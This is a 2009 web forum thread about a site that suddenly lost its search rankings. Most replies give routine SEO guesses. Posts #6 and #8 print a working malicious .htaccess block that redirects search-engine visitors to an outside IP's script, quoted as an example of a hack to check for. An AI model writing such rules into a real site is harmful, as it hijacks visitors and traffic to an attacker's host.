Go Back   WarriorForum - Internet Marketing Forums > The Warrior Forum > Adsense / PPC / SEO Discussion Forum
Register Blogs FAQ Social Groups CalendarHelp Desk

Reply
 
LinkBack Thread Tools
Old 12-18-2009, 04:29 PM   #1
HyperActive Warrior
 
Join Date: Feb 2009
Posts: 201
Thanks: 6
Thanked 10 Times in 10 Posts
Default Site suddenly sropped from search results

My site has suddenly stopped appearing in the search results. This has been happening since last two days. Before that I was getting more than 90% traffic from search engines and had reasonable amount of traffic.

Any ideas why this suddenly started happening. Any suggestions?
pluto1 is online now   Reply With Quote
Old 12-18-2009, 04:37 PM   #2
People Know Me
War Room Member
 
aaron_nimocks's Avatar
 
Join Date: Sep 2006
Location: Virginia Beach
Posts: 667
Thanks: 21
Thanked 129 Times in 111 Posts
Social Networking View Member's FaceBook Profile 
Contact Info
Send a message via Skype™ to aaron_nimocks
Default Re: Site suddenly sropped from search results

Could be the normal fluctuation. If it stays this way another week then you might want to start worrying.

Need a Wordpress Consultant? Have Wordpress questions? Please contact me and I can help you.
aaron_nimocks is offline   Reply With Quote
Old 12-18-2009, 04:45 PM   #3
AdSense Crazy
 
nettech's Avatar
 
Join Date: Jul 2008
Location: London, United Kingdom & one day Dubai (UAE)
Posts: 731
Thanks: 86
Thanked 81 Times in 71 Posts
Default Re: Site suddenly sropped from search results

Is it a new site?

Also, have you been engaging in some heavy link building? It seems like a Google dance which is quite normal, but if its an old established domain then you may have problems, otherwise I wouldnt worry too much, give it about a week!
nettech is offline   Reply With Quote
Old 12-18-2009, 05:05 PM   #4
HyperActive Warrior
 
Join Date: Feb 2009
Posts: 201
Thanks: 6
Thanked 10 Times in 10 Posts
Default Re: Site suddenly sropped from search results

Domain is more than 2 yrs old, but I recently started posting on it. It was showing up pretty decently in the search results without me doing anything.

So, I started posting frequently on it some 2 weeks ago. The search results were impressive for that kind of effort. But suddenly, two days ago, it stopped showing on search results. Even though the links still show up when I search for sitename.com
pluto1 is online now   Reply With Quote
Old 12-18-2009, 05:15 PM   #5
SEO / SEM ninja
War Room Member
 
Join Date: Feb 2009
Location: West Jordan, UT
Posts: 137
Thanks: 14
Thanked 7 Times in 7 Posts
Social Networking View Member's Twitter Profile 
Default Re: Site suddenly sropped from search results

if the pages still show up in the search engine through a site:domain.com search, you're fine. just the "google dance" aka google split-testing their results. it should return to normal in a week or two.

Read my blog on SEM: http://loveridgemarketing.com
mloveridge17 is offline   Reply With Quote
Old 12-18-2009, 06:08 PM   #6
Phil B
War Room Member
 
Join Date: Jun 2005
Location: , , .
Posts: 78
Thanks: 27
Thanked 3 Times in 3 Posts
Default Re: Site suddenly sropped from search results

Quote:
Originally Posted by pluto1 View Post
My site has suddenly stopped appearing in the search results. This has been happening since last two days. Before that I was getting more than 90% traffic from search engines and had reasonable amount of traffic.

Any ideas why this suddenly started happening. Any suggestions?
Are you saying your sites are suddenly not ranking in the search engines or has traffic to your sites from search engines suddenly stopped?

If it's the later, check the .htaccess file for the sites. There may be code inserted by hackers in the file that hijacks your search engine traffic.

The malicious code will look something like this:
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://IP/in.cgi?4&parameter=sf [R,L]
bluefoot is offline   Reply With Quote
Old 12-18-2009, 06:20 PM   #7
VioletHills
 
Join Date: Aug 2009
Posts: 83
Thanks: 0
Thanked 2 Times in 2 Posts
Default Re: Site suddenly sropped from search results

If it is a new site, you may fall into the sandbox.You can chek you log if the spider still visits your site but you don have any keywords ranking.

ShanghaiTours is offline   Reply With Quote
Old 12-18-2009, 08:44 PM   #8
HyperActive Warrior
 
Join Date: Feb 2009
Posts: 201
Thanks: 6
Thanked 10 Times in 10 Posts
Default Re: Site suddenly sropped from search results

Quote:
Originally Posted by bluefoot View Post
Are you saying your sites are suddenly not ranking in the search engines or has traffic to your sites from search engines suddenly stopped?

If it's the later, check the .htaccess file for the sites. There may be code inserted by hackers in the file that hijacks your search engine traffic.

The malicious code will look something like this:
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://IP/in.cgi?4&parameter=sf [R,L]
It is the first one. My sites are suddenly not ranking for my keywords since last 2 days. It was on the first page before that, and was sending more than 90% of organic search traffic.

I also checked for this malicious code in .htaccess file, but did not find anything like that.
pluto1 is online now   Reply With Quote
Old 12-19-2009, 02:09 PM   #9
HyperActive Warrior
 
tjcocker's Avatar
 
Join Date: Jul 2009
Location: Boulder, CO
Posts: 339
Thanks: 9
Thanked 31 Times in 25 Posts
Default Re: Site suddenly sropped from search results

Could be that the new posts pushed the older posts that were ranking off the homepage.

Initrode Consulting -Boulder SEO, Copywriting, Editing, Website design, etc...
tjcocker is offline   Reply With Quote
Old 12-19-2009, 03:51 PM   #10
HyperActive Warrior
War Room Member
 
parzlou's Avatar
 
Join Date: Jan 2008
Location: , , USA.
Posts: 196
Thanks: 41
Thanked 19 Times in 19 Posts
Default Re: Site suddenly sropped from search results

I have a site that shows all pages indexed when I use... site:domain dotcom

it also shows all pages indexed when I use.... site:http://domain dotcom

but , when I use .... site:www.domain dotcom it show no documents found Why is that ?

thanks

Internet Marketing Sales & Service
ParzLou OnLine
parzlou is offline   Reply With Quote
Reply

  WarriorForum - Internet Marketing Forums > The Warrior Forum > Adsense / PPC / SEO Discussion Forum

Tags
results, search, site, sropped, suddenly

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off



All times are GMT -6. The time now is 01:26 PM.